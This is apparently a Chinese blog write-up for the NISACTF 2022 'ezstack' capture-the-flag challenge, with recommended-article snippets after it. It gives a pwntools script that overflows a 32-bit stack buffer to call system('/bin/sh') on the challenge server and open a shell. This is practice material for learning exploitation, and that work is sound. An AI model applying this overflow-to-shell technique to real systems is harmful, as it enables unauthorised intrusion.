[NISACTF 2022]ezstack-入土为安的第十四天

于 2024-08-03 20:34:27 发布
阅读量172 收藏
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzx13290757580/article/details/140895207
版权

签到题吧 

checksec pwn  没有保护

进入main函数,点进shell ,buf 88808048buf

system 08048512

'/bin/sh 0804A024

直接让代码溢出调用system和/bin/sh

from pwn import *

# 连接到远程服务
p = remote('node5.anna.nssctf.cn', 20789)

# 构造 payload
payload = b'a' * (0x48 + 0x4) + p32(0x08048512) + p32(0x804A024)

# 发送 payload
p.sendlineafter('NISACTF', payload)

# 进入交互模式
p.interactive()

丸卜
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NISACTF 2022 writeup
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
最详细的Spring-data-jpa入门(一)
热门推荐
此成非彼诚博客
08-13 10万+
刚进公司,人生地不熟,偷偷藏着本《mybatis入土为安》,以为可以靠mybatis混的轻松点,谁知天有不测风云,大家用的是JPA。我这个小白没有听说过,全英文名叫,就是java持久化api,是SUN公司推出的一套基于的规范。持久化想必如雷贯耳,都0202年了,谁还不用个持久化框架啊,举起mybatis。ORM呢?全英文名为:对象关系映射,简单来说为了不用JDBC那一套原始方法来操作数据库,ORM框架横空出世(mybatis、hibernate等等)。...
【PWN · ret2libc】[NISACTF 2022]ezstack
Mr_Fmnwon的博客
05-27 1299
通过查看ELF文件信息,确定攻击方法,实现ret2libc1类型的攻击简单的ret2libc1类型题目。
NISACTF 2022 ezstack
2301_79793667的博客
12-11 251
在我输入good之后,就被弹出程序了,这时我们需要检查一下附件,然后用ida打开。buf[72] 0x48,读入0x60的信息,存在read栈溢出。用32位ida进行打开,main函数中只有一个shell函数。存在system,必存在system的plt表信息。先进行nc连接,看一下情况。首先打开环境,下载附件。/bin/sh的地址。
NSSCTF刷题笔记pwn6——[NISACTF 2022]ezstack
qq_45692883的博客
02-02 293
这个shell会使用system函数打印一串内容,并且发现我们读入的数据大于buf的大小,存在栈溢出。栈溢出,system函数,/bin/sh字符串,那么万事已经具备了,开始写脚本。按下shift+12,在字符串界面找到/bin/sh。用ida打开,有一个shell函数。
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 1871
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
初中语文文摘社会入土为安
09-09
1. 文章标题和描述中的"入土为安"是中国传统文化中的一种观念,意味着逝者下葬后,其灵魂得以安宁,家人也可以得到心灵的慰藉。这一概念通常与丧葬习俗有关,表达了人们对死亡和安息的尊重。 2. "入土为安"在文章中...
殡葬行业报告福成股份-崛起中的殡葬龙头
03-25
殡葬行业近千亿市场规模,其中占比过半、民营参与度最高的当属经营性公墓。受到土地属性和民政局经营许可牌照两方面制约,经营性公墓...我国隆丧厚葬传统悠久,孝文化和“入土为安”思想使买方很少议价,行业利润丰厚。
iofod - 为攻城师们打造的低代码平台
xiaodongbi的博客
08-16 313
新一代大前端利器 iofod 开放公测!应用开发领域的 Photoshop,专门为攻城师们打造的低代码开发平台,应用开发毫不费力。本文将从多个方面切入快速介绍 iofod 独特的地方,同时分享设计上的思考,希望能抛砖引玉。正文开始前先通过一段小视频感受下 iofod。视频。...
结婚红包贺词精选.doc
10-11
8. "恩恩爱爱锋芒毕露,嘻嘻哈哈凡百一新" - 这是对新人恩爱生活的生动描绘,希望他们在欢笑中度过每一天,共同创造新的生活篇章。 9. "哥们,你居然娶了大明湖畔的夏雨荷呀!恭喜!"这句贺词巧妙地引用了《还珠...
PWN刷题解析
最新发布
m0_73373164的博客
03-09 527
这个题涉及的知识点有点多毕竟保护全开,打开ida查看到sub函数里面的有个字符串溢出可以得到canary和基地址,用gdb因为开启了ple不能在main函数上下断点就只有下在printf上了然后调试你可以用stack查看到rbp上面的地址是****00可以猜到这个就是canary了因为canary一般情况下都是以00结尾的,canary保护主要是通过在栈下设置一个地址,返回是也必须带上那个地址不然就会触发保护,然后ple保护的话主要是通过每次修改.text、.data的地址。
[NISACTF 2022]ezpie 全网最详细
qq_41937545的博客
10-19 737
我们只需要在接收到70的时候 接收末尾10字节的 整数(这样就可以在 payload当中利用 main函数的地址)思路就是 需要利用这个main函数的地址 多次连接会发现 他的 main函数都是 70结尾的。每一次运行程序的时候 地址都会被随机 所以我们在ida 当中没办法直接看到 地址。现在就需要计算shell到main函数的偏移量(因为我们只知道main的地址)emm 但是nc 的时候他直接给出了 main 函数的真实地址。然后计算一下偏移量(虽然有随机地址的保护 但是偏移量是不变的)
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3453
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
创建Zigbee Z-Stack 3.0.1 BSP(四)--移植UltraIot开发板LED
詆調
08-15 1451
概述UltraIot开发板LED开发板上有三个用户LED指示灯,这三个指示灯所使用的IO口与IT的评估板有所不同,所以需要根据UltraIot开发板底板的原理图来修改IO口。 UltraIot开发板LED原理图如下所示: 有图可以得到: 1、P1.0 ,P1.1,P1.4分别控制LED2,LED3,LED1 2、P1.0 ,P1.1,P1.4输出高电平时LED高亮,P1.0 ,P1.1,
[NISACTF 2022]上
qq_62046696的博客
07-26 4296
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
CDUT新生赛wp pwn web
weixin_47234647的博客
10-18 291
一起讲了得了 贝壳是什么东西 kali中终端运行 nc ctf.dino209.cn 8001 然后直接拿到flag EZStack_Overflow 栈溢出的题 ida打开 双击第四行函数 可以看到我们的buf变量开了132的空间 但是可以read256个字符 所以会造成栈溢出 我也不太懂 我不是pwn手 ebp是栈帧地址 现在离他的距离是88(16进制 十进制是136 我们可以双击buf查看 为了覆盖r 所以我们构建140个"a"的payload 可以轻松找到后门函数 tab 再空格 找到后
zstack(四)zstack架构简介
任杰的博客
04-27 5735
本篇简单介绍一下zstack的架构设计。现在的zstack加入了一个新的模块woodpecher,用于自动化测试。由于本人对这块没有研究过,这里先不讲这个。
BUUCTF-pwn(6)
njh18790816639的博客
11-30 3072
wustctf2020_getshell 现在还有这种简单题吗??? picoctf_2018_buffer overflow 1 没想到还有这么简单的题! 并发现了后门函数! cmcc_simplerop 函数逻辑比较简单。 这里经过调试,发现padding为0x20 寻找一些又用的gadget。 使用SROP来进行攻击! from pwn import * context(log_level='debug',os='linux',arch='i386') r = remote('
Stack的三种含义
ThomasYouung
12-02 1472
学习编程的时候,经常会看到stack这个词,它的中文名字叫做”栈”。 理解这个概念,对于理解程序的运行至关重要。容易混淆的是,这个词其实有三种含义,适用于不同的场合,必须加以区分。 含义一:数据结构 stack的第一种含义是一组数据的存放方式,特点为LIFO,即后进先出(Last in, first out)。 在这种数据结构中,数据像积木那样一层层堆起来,后面加入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值